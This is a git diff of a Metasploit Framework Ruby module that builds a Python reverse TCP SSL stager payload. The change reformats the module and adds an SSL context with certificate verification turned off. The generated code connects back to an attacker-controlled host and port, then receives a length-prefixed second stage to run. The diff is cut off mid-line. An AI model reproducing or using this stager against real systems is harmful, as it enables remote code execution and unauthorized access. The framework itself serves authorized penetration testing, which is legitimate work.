diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index affcb12f337ea..c8c6f8be1e588 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -1,88 +1,95 @@ # -*- coding: binary -*- module Msf - -### -# -# Complex reverse_tcp_ssl payload generation for Python -# -### - -module Payload::Python::ReverseTcpSsl - - include Msf::Payload::Python - include Msf::Payload::Python::ReverseTcp - def initialize(*args) - super - register_advanced_options(Msf::Opt::stager_retry_options) - end - + ### # - # Generate the first stage + # Complex reverse_tcp_ssl payload generation for Python # - def generate(_opts = {}) - conf = { - port: datastore['LPORT'], - host: datastore['LHOST'], - retry_count: datastore['StagerRetryCount'], - retry_wait: datastore['StagerRetryWait'] - } + ### - generate_reverse_tcp_ssl(conf) - end + module Payload::Python::ReverseTcpSsl + include Msf::Payload::Python + include Msf::Payload::Python::ReverseTcp + def initialize(*args) + super + register_advanced_options(Msf::Opt.stager_retry_options) + end - # - # By default, we don't want to send the UUID, but we'll send - # for certain payloads if requested. - # - def include_send_uuid - false - end + # + # Generate the first stage + # + def generate(_opts = {}) + conf = { + port: datastore['LPORT'], + host: datastore['LHOST'], + retry_count: datastore['StagerRetryCount'], + retry_wait: datastore['StagerRetryWait'] + } - def supports_ssl? - true - end + generate_reverse_tcp_ssl(conf) + end - def generate_reverse_tcp_ssl(opts={}) - # Set up the socket - cmd = "import zlib,base64,ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n" - if opts[:retry_wait].blank? # do not retry at all (old style) - cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 - cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" - cmd << "s=ssl.wrap_socket(so)\n" - else - if opts[:retry_count] > 0 - cmd << "for x in range(#{opts[:retry_count].to_i}):\n" - else - cmd << "while 1:\n" - end - cmd << "\ttry:\n" - cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 - cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" - cmd << "\t\ts=ssl.wrap_socket(so)\n" - cmd << "\t\tbreak\n" - cmd << "\texcept:\n" - if opts[:retry_wait].to_i <= 0 - cmd << "\t\tpass\n" # retry immediately - else - cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting - end + # + # By default, we don't want to send the UUID, but we'll send + # for certain payloads if requested. + # + def include_send_uuid + false end - cmd << py_send_uuid if include_send_uuid - cmd << "l=struct.unpack('>I',s.recv(4))[0]\n" - cmd << "d=s.recv(l)\n" - cmd << "while len(d) 0 + cmd << "for x in range(#{opts[:retry_count].to_i}):\n" + else + cmd << "while 1:\n" + end + cmd << "\ttry:\n" + cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 + cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" + cmd << "\t\tif hasattr(ssl, \"PROTOCOL_TLS_CLIENT\"):\n" + cmd << "\t\t\tcontext=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n" + cmd << "\t\t\tcontext.check_hostname = False\n" + cmd << "\t\t\tcontext.verify_mode = ssl.CERT_NONE\n" + cmd << "\t\t\tso = context.wrap_socket(so)\n" + cmd << "\t\telse:\n" + cmd << "\t\t\tso = ssl.wrap_socket(so)\n" + cmd << "\t\tbreak\n" + cmd << "\texcept:\n" + if opts[:retry_wait].to_i <= 0 + cmd << "\t\tpass\n" # retry immediately + else + cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting + end + end + cmd << py_send_uuid if include_send_uuid + cmd << "l=struct.unpack('>I',so.recv(4))[0]\n" + cmd << "d=so.recv(l)\n" + cmd << "while len(d)